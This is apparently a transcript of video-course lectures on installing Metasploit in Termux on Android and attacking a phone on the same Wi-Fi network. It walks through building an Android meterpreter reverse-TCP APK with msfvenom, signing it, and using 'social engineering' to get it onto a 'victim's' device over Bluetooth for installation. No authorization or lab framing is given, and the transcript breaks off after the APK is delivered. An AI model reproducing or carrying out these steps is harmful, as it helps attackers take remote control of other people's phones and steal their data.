Just a quick reminder, when we have successfully installed the Metasploit package and Metasploit framework installation finished is shown in our screen, there at the top you can see the command for database server. Make sure you copy the command and save it in Notepad. It will be in use while we are generating the payload.
So now I hope Metasploit has been successfully installed in your Android device and you're getting Metasploit framework installation finished in your screen. Next, let us see how to run and test Metasploit framework. If you directly type Metasploit, it will show command not found. So, first of all, we need to go inside the Metasploit framework directory. Now, if you have installed correctly as demonstrated in our last video lecture, then you need to first go to user directory. So, for that, first cd space dot dot. So once you have typed cd space dot dot, then when you will type ls command, you will see usr directory, that is user directory. Change the directory to user, then ls. Next, we need to go to opt directory. Now as you can see, Metasploit framework is now inside the opt directory. So now we'll change the directory to Metasploit framework. Simply type cd space Metasploit framework and hit enter. One more thing, make sure you remember how we came till Metasploit framework, because this is how we need to do everything. This is how we need to do every time when we'll be using Metasploit. As you can see, we are inside the Metasploit framework. There are many files and folders inside it. Now simply type dot forward slash msf console and hit enter. Now what is the MSF console? The MSF console is probably the most popular interface to the Metasploit framework, MSF. It provides an all-in-one centralized console and allows you efficient access to virtually all the options available in the MSF, that is Metasploit framework. MSF console may seem intimidating at first, but once you learn the syntax of the commands, you will learn to appreciate the power of utilizing the interface. Now, once everything is installed successfully, you will see the number of exploits, auxiliaries, posts, payloads, encoders, and nopes available. Now we have come across all the terms in our previous video lectures and reading materials. So till now, if you face any problem regarding understanding of any terms or the installation procedure, feel free to reach out. Thank you so much. See you in the next class. Till now, we have successfully installed Metasploit framework and run the MSF console. Now, we can use the help command to see what are the commands available inside the MSF console. simply type help and hit enter. Just scroll up and see the various commands available. Now here we'll try to use the banner command. As you can see, as soon as I have written banner and hit enter, the banner has been changed.
Hello everyone and welcome to the class. Now in this video lecture, we'll quickly go through a practical demonstration of Metasploit exploits and payloads over LAN. So first of all, what is a LAN? LAN, that is a local area network, is a computer network that interconnects computers within a limited area such as residence, school, laboratory, university campus or office building. So, if any device is connected to our home Wi-Fi or router and we are in the same LAN, we are in the same LAN network, the attacker can easily get into the victim's mobile device. Very important note is, victim and the attacker should be in the same network. Say for an example, the attacker is connected to a home Wi-Fi named as ABC, and if victim is also connected to the same Wi-Fi network, then only the attack would be successful. Now, if the victim is using his or her own data pack, then this over the LAN attack won't be successful. For that case, we have another attack called as over the WAN attack, which we will cover in our upcoming lecture. So considering that attackers and the victim both are in the same Wi-Fi network, first we'll go inside the Metasploit framework directory and make sure you follow the steps properly. Otherwise, you won't be able to generate the payload. So next, we'll type dot forward slash msf venom. In simple terms, MSF Venom is used to generate the payloads for any operating system. And then -p for payload. Then we need to generate payload for Android. So Android forward slash meterpreter forward slash reverse TCP. So by typing this, we are mentioning that we are generating a payload for Android device. So therefore we need a meterpreter session of an Android device and we will do the exploitation in the reverse TCP. I'll come once again. In simple terms, MSF Venom is used to generate payloads for any operating system, and then -p for payload. Then we need to generate a payload for Android. So Android forward slash meterpreter forward slash reverse TCP. And so by typing this, we are mentioning that we are generating a payload for Android device. So we need a meterpreter session of an Android device. And we'll do the exploitation in the reverse TCP. Then we need to write lhost. So lhost is listening host. So now open up a new session in Termux. Make sure you're connected to a Wi-Fi and type ifconfig. Make sure you copy the WLAN, that is wireless LAN IP, and paste it as demonstrated in the video lecture. One important point to remember, IP address are different for different devices. And one more important thing, if you are facing any problem in understanding LAN, WLAN or IP address, please go through the articles and reading materials attached in this course. And also very soon I'll be coming up with complete networking course for beginners, which will be very useful for all of us to understand the use of computer networks. So coming back to our payload generation, after lhost is given, we'll write lport, that is listening port. We have a range of 65,000 ports available in our system. So we'll simply use any port number, say example 4444, and then type in -o for output and give the path, like where you want to save this payload in your device. So here I am using L port as 8080, -o for output, and then giving my location, like where I need to, where I'll download this, where this test.apk will be generated. It will take a few seconds to generate. As you can see, the payload has been successfully generated. So we have completed this step 1. I'll come again, like after minus O stands for the output and will give the path. Okay, so in this we have given the path as /SD card, and inside the SD card we have given the APK name like test.apk. So as you can see, uh, it has the payload has been saved as SD card, inside SD card test.apk. Once you will open up your internal storage, you'll find inside SD card test.apk have been generated. Now next we'll install MI Explorer. Search MI Explorer APK and install from up2down.com. So basically MI Explorer is a comprehensive file management tool that helps you to work comfortably with all the files and folders on your Android. What's more, it has a clean and well designed interface that's also totally customizable. So once it is installed, that is MI Explorer, next we'll sign the APK. So we'll download the latest version. I've already downloaded, so it's there in my it's there in my device. Once MI Explorer is installed, next we'll sign the APK. Application signing ensures that one application cannot access any other application except through well-defined IPC. So when an application, that is APK file, is installed onto an Android device, the package manager verifies that the APK has been properly signed with the certificate included in that APK. So as you can see, I have opened MI Explorer and inside internal storage I can see test.apk. So the test.apk is there inside my internal storage. In the right hand side you can see there is the option sign. Add to the task, sign, and then auto. As you can see, test sign.apk has been created. Now next, with the help of social engineering, we'll send it to our victim with the help of Bluetooth, share it, or whatever platform you want. With the help of social engineering, we'll send it to our victim. Now as you can see, I am sending the file to my victim with the help of Bluetooth. So sending file to Redmi. As you can see, this is my victim's device. The file this is the incoming Bluetooth file. We need to accept it. Test sign.apk. So the file is inside my victim's device. Now he or she just need to install this APK. As you can see, the APK has been successfully delivered, sent to my victim device. So now we'll come back to